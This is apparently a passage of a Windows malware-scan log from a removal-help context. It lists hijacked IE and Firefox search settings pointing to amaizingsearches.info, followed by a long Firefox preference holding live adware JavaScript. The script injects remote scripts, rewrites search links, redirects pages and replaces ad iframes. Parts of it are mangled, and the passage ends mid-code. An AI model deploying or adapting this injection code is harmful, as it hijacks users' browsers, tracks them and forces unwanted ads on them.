http://websearch.amaizingsearches.info/?l=1&q={searchTerms}&pid=34&r=2014/04/11&hid=2754579029231123871&lg=EN&cc=PL&unqvl=51 IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 57 BE 27 3F CC 4D CF 01 [binary data] IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\..\SearchScopes,DefaultScope = {BB74DE59-BC4C-4172-9AC4-73315F71CFFE} IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SR IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\..\SearchScopes\{47B18540-12A2-4075-9B82-64CA780E5281}: "URL" = http://www.idg.pl?q={searchTerms} IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\..\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}: "URL" = http://websearch.amaizingsearches.info/?l=1&q={searchTerms}&pid=34&r=2014/04/11&hid=2754579029231123871&lg=EN&cc=PL&unqvl=51 IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-3157971982-3015690372-1238881662-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.defaultenginename,S: S", "WebSearch" FF - prefs.js..browser.search.defaulturl: "http://websearch.amaizingsearches.info/?pid=34&r=2014/04/11&hid=2754579029231123871&lg=EN&cc=PL&unqvl=51&l=1&q=" FF - prefs.js..browser.search.order.1: "WebSearch" FF - prefs.js..browser.search.order.1,S: S", "WebSearch" FF - prefs.js..browser.search.selectedEngine,S: S", "WebSearch" FF - prefs.js..extensions.enabledAddons: quick_start%40gmail.com:3.2.6 FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0 FF - prefs.js..extensions.kuby4Nw2ytG.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=563910&ext=save%20net&systemid=2754579029231123871\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){if(window.self==window.top&&!document.getElementById('shk85shssma')){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.id='shk85shssma';a.src=-1a;a++)b+=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\".charAt(Math.floor(52*Math.random())); return b};b.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};b.inject_script=function(b){if(b instanceof Array)for(var a=0;ae||!c||parseInt(c)>e||a.checkXtrg(b,g):a.checkXtrg(b,g)};a.init=function(){if(\"undefined\"!==typeof localStorage&&\"undefined\"!==typeof localStorage.getItem&&-1==window.location.href.indexOf(a.pop_collision_id)&&-1g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;ec.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;fhistory.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=pdrKrjwKqjUKrjwFfHwHpjUFrHU7qHk%3D&eid=313&hid=2754579029231123871&pid=34&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendapplicationget.com/g.php?pr=2&d=\"+window.self.location.hostname+\"&s=0&r=\"+(+new Date).toString()+Math.random(),b=0;b-1){return};try{if(typeof(localStorage)!='undefined' && (window.self.location.hostname.indexOf('adnxs.com')>-1 || window.self.location.hostname.indexOf('doubleclick')>-1 || window.self.location.hostname.indexOf('cloudfront')>-1)){localStorage.setItem(\"xhxg4sk42hsba\",\"9\")}}catch(e){};var _wlst={lsKey:\"xhxg4sk42hsba\",get:function(b,a){if(window.self.location.protocol==\"https:\" || 3>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['adacive_gen',193],['cpx_bet_55',1825],['sonobi_gen',40],['harren_apx1',15],['matomy_adj30',2252],['adstract_5new',80],['xertive_apx_13',190],['saymedia_15_2',973],['mari_qadabra2',473],['cpx_favor8',241],['dsnr_dasa_f3',145],['dsnr_nntbr_f3',117],['mari_gen31',895],['baba_nontb_new10',578],['velis_gen24',431],['web3_gen30',290],['adsuduos_apx19',1222],['mango_apx16',40]],[['cpx_nontb30_tr',432],['cpx_youtube',411],['matomy_strm29',4337],['adstract_5strm',177],['mari_strm44',3551],['web3_strm30',1092]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function(b){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('7o6w_srP=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"a.adorika.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ads.sonobi.com\"||window.self.location.hostname==\"ads.networkhm.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"adservingstd.com\"||window.self.location.hostname==\"ads.qadserve.com\"||window.self.location.hostname==\"servedby.adsplats.com\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.mangomediaads.com\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=563910')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s8968476006672074033\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a[b].ifr,a[b].size);b++;a&&a[b]&&\"function\"==typeof a[b].func&&setTimeout(function(){a[b].func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + '7o6w_srP=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script> \\x3c/body>\\x3c/html>');}catch(e){var h = '\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script> ');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write(''+url+'');break;}try{ifr.setAttribute(\"s8968476006672074033\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{adacive_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://a.adorika.net/c/banner_s?tenant=AD&selection=7002&size='+size+'&skin=iframe', (atp?atp:1), [246,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size='+size+'&referrer=', (atp?atp:1), [354,size]);}}catch(e){return !1;}},sonobi_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2445816\",\"300x250\":\"2445810\",\"728x90\":\"2445826\"}[size];var surl='http://ads.sonobi.com/tt?id='+ arr + '&cb=[CACHEBUSTER]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [811,size]);}}catch(e){return !1;}},harren_apx1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2479274\",\"300x250\":\"2479275\",\"728x90\":\"2479276\"}[size];var surl='http://ads.networkhm.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [953,size]);}}catch(e){return !1;}},matomy_adj30:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2461741\",\"728x90\":\"2461742\",\"160x600\":\"2461743\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1006,size]);}}catch(e){return !1;}},adstract_5new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2462679&size='+size+'', (atp?atp:1), [1048,size]);}}catch(e){return !1;}},xertive_apx_13:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"120x600\":\"2500356\",\"160x600\":\"2500375\",\"300x250\":\"2500403\",\"728x90\":\"2500441\",\"468x60\":\"2500445\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1091,size]);}}catch(e){return !1;}},saymedia_15_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2538885\",\"300x250\":\"2538886\",\"728x90\":\"2538887\"}[size];var surl='http://adservingstd.com/sisi?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1158,size]);}}catch(e){return !1;}},mari_qadabra2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.qadserve.com/t?id=eef24e83-a14f-44f1-bb81-5819b60465cb&size='+size+'&iframe=true', (atp?atp:1), [1352,size]);}}catch(e){return !1;}},cpx_favor8:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2577973&size='+size+'&referrer=${REFERER_URL}', (atp?atp:1), [1308,size]);}}catch(e){return !1;}},dsnr_dasa_f3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2464312&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [1041,size]);}}catch(e){return !1;}},dsnr_nntbr_f3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2464083&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [1045,size]);}}catch(e){return !1;}},mari_gen31:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566121\",\"300x250\":\"2566122\",\"160x600\":\"2566123\",\"120x600\":\"2566124\",\"468x60\":\"2566125\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1262,size]);}}catch(e){return !1;}},baba_nontb_new10:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566930\",\"300x250\":\"2566931\",\"160x600\":\"2566932\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1251,size]);}}catch(e){return !1;}},velis_gen24:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600 120x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2563619\",\"300x250\":\"2563620\",\"160x600\":\"2563621\",\"120x600\":\"2563622\",\"468x60\":\"2563624\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1220,size]);}}catch(e){return !1;}},web3_gen30:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2561531&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]\" FRAMEBORDER=\"0\" SCROLLING=\"no\" MARGINHEIGHT=\"0\" MARGINWIDTH=\"0\" TOPMARGIN=\"0\" LEFTMARGIN=\"0\" ALLOWTRANSPARENCY=\"true\" WIDTH=\"[WIDTH]\" HEIGHT=\"[HEIGHT]', (atp?atp:1), [1191,size]);}}catch(e){return !1;}},adsuduos_apx19:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2591751\",\"300x250\":\"2591753\",\"728x90\":\"2591754\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1322,size]);}}catch(e){return !1;}},mango_apx16:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 160x600 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2595809\",\"160x600\":\"2595810\",\"728x90\":\"2595811\"}[size];var surl='http://ads.mangomediaads.com/tt?id='+ arr + '&cb=${CACHEBUSTER}&referrer=${REFERER_URL}&pubclick=${CLICK_TAG}';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1324,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size='+size+'&referrer=', (atp?atp:1), [442,size]);}}catch(e){return !1;}},cpx_youtube:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2476283&size='+size+'&referrer=${REFERER_URL}', (atp?atp:1), [943,size]);}}catch(e){return !1;}},matomy_strm29:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"2461800\",\"728x90\":\"2461807\",\"160x600\":\"2461810\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1004,size]);}}catch(e){return !1;}},adstract_5strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2462781&size='+size+'', (atp?atp:1), [1053,size]);}}catch(e){return !1;}},mari_strm44:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2566232\",\"300x250\":\"2566233\",\"160x600\":\"2566234\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1282,size]);}}catch(e){return !1;}},web3_strm30:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return 